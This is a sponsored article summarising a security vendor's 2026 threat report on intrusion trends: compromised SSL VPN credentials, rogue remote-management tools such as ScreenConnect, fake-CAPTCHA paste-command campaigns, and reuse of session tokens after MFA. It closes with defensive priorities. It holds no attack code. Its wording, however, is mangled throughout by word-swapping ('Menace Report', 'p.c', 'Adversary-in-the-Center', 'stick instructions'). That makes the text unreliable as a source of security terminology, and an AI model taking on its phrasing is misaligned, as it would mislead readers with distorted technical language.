Distant entry and trusted administrative instruments play a central function in how organizations function immediately. In response to Blackpoint Cyber’s 2026 Annual Menace Report, they’re additionally more and more central to how intrusions start.
Knowledgeable by evaluation of 1000’s of safety investigations performed in the course of the reporting interval, the report highlights a shift in attacker conduct. Relatively than relying totally on vulnerability exploitation, menace actors ceaselessly gained entry through the use of legitimate credentials, authentic instruments, and routine user-driven actions.
The report examines these patterns, paperwork the place intrusion exercise was disrupted, and presents defensive priorities derived from analyzed incident response outcomes noticed all through 2025.
Further knowledge and incident walkthroughs can be lined throughout an upcoming stay webinar hosted by Blackpoint Cyber.
Key Findings From the 2026 Annual Menace Report
Attackers Are Coming into By Official Entry Paths
Throughout incidents analyzed within the report, attackers have been extra more likely to log in utilizing authentic entry than to take advantage of vulnerabilities as their major entry level.
SSL VPN abuse accounted for 32.8 p.c of all identifiable incidents, making it one of the vital frequent preliminary entry vectors. In lots of instances, menace actors authenticated utilizing legitimate however compromised credentials, leading to VPN classes that appeared authentic to safety controls.
As soon as entry was established, these classes usually offered broad inside attain, permitting attackers to maneuver quickly towards high-value techniques with out instantly triggering alerts.
Trusted IT Instruments Are Being Used In opposition to Organizations
The report additionally paperwork frequent abuse of authentic Distant Monitoring and Administration instruments as a technique of entry and persistence.
RMM abuse appeared in 30.3 p.c of identifiable incidents, with ScreenConnect current in additional than 70 p.c of rogue RMM instances. As a result of these instruments are generally used for traditional IT administration, unauthorized installations usually resembled anticipated exercise and have been tough to differentiate with out robust visibility.
The report notes that environments with a number of distant entry instruments in use have been extra more likely to see rogue situations mix in with present tooling.
Social Engineering, Not Exploits, Drove the Majority of Incidents
Whereas authentic entry paths enabled many intrusions, person interplay represented the biggest driver of general incident quantity.
Pretend CAPTCHA and ClickFix-style campaigns accounted for 57.5 p.c of all identifiable incidents, making them the most typical assault sample documented within the report.
Relatively than exploiting software program vulnerabilities, these campaigns relied on misleading prompts. Customers have been instructed to stick instructions into the Home windows Run dialog as a part of what gave the impression to be a routine verification step. Execution used built-in Home windows instruments, with out conventional malware downloads or exploit exercise.
Cloud Intrusions Targeted on Session Reuse After MFA
Multi-factor authentication was enabled in lots of cloud environments related to investigated incidents, but account compromise nonetheless occurred.
Adversary-in-the-Center phishing accounted for about 16 p.c of cloud account disables documented within the report. In these eventualities, MFA functioned as designed. As an alternative of bypassing authentication, attackers captured authenticated session tokens issued after profitable MFA and reused them to entry cloud companies.
From the attitude of the cloud platform, this exercise aligned with a authentic authenticated session.
Lots of the assaults described above start with authentic entry. What occurs subsequent is the place actual harm happens.
In a latest investigation, our SOC recognized a brand new implant known as Roadk1ll, designed to pivot throughout techniques utilizing WebSocket-based communication and preserve entry whereas mixing into community site visitors.
Be a part of Contained in the SOC Episode #002 to see how these assaults progress from preliminary entry to full atmosphere compromise.
What These Findings Imply for Safety Groups
Throughout industries, environments, and assault varieties, the report highlights a constant sample: many profitable intrusions relied on exercise that blended into regular operations.
Relatively than counting on novel exploits or superior malware, attackers abused on a regular basis workflows akin to distant logins, trusted instruments, and customary person actions. Primarily based on the assault chains analyzed, the report identifies a number of defensive priorities:
- Deal with distant entry as high-risk, high-impact exercise
- Preserve an entire stock of accepted RMM instruments and take away unused or legacy brokers
- Limit unapproved software program installations and restrict execution from user-writable directories
- Apply Conditional Entry controls that consider gadget posture, location, and session danger
These patterns have been documented throughout ceaselessly focused sectors, together with manufacturing, healthcare, MSPs, monetary companies, and development.
For groups keen on inspecting how these intrusion patterns unfold, Blackpoint Cyber will evaluation key findings, case examples, and defensive takeaways from the 2026 Annual Menace Report throughout an upcoming stay webinar.
➡️ Register to obtain the 2026 Annual Menace Report
Sponsored and written by Blackpoint Cyber.
